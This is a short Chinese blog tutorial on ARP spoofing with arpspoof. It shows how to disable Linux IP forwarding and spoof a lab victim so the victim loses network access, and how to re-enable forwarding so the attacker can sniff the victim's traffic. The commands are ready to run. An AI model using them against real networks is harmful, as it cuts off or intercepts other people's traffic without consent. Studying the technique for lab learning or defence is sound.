版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/lixiangminghate/article/details/86691609
写了这么多Ettercap,插一个小插曲,简单提一下arpspoof。arpspoof也是ARP嗅探工具,用于断网攻击就像是提炼石油时获得沥青一样,并非主要用途。arpspoof需要用到linux内核转发功能。内核转发一般用在2种场景:
1.主机上2块网卡,一块接内网,一块接外网;将内网的数据转发到外网,使得主机具有网关的作用。
2.端口转发(配合iptables)。
现在开始主题:
1.断网攻击:
1.1.关闭linux内核转发:
echo "0" > /proc/sys/net/ipv4/ip_forward
1.2.运行arpspoof
受害者主机IP:192.168.75.129 局域网路由:192.168.75.2
arpspoof -i eth0 -t 192.168.75.129 -r 192.168.75.2
#arpspoof命令形式:
#arpspoof -i interface -t target-ip -r host-ip
#-i 指定用于ARP欺骗的网卡
#-t target-ip 指定被ARP欺骗的目标主机ip
#-r 用于双向欺骗
#host-ip 一般是局域网中路由器。按我理解,host-ip是局域网中于target-ip通信的另一台主机。用于指定进行ARP欺骗的通信双方
由于关闭了内核转发功能,arpspoof收到目标机的数据包后,不再转发到路由器,因此实现了断网的功能。
2.网络嗅探:
重新开启内核转发功能,arpspoof收到目标机器的数据包后,有机会转发给路由器
echo "1" > /proc/sys/net/ipv4/ip_forward
剩下的命令和断网攻击一样,不在赘述。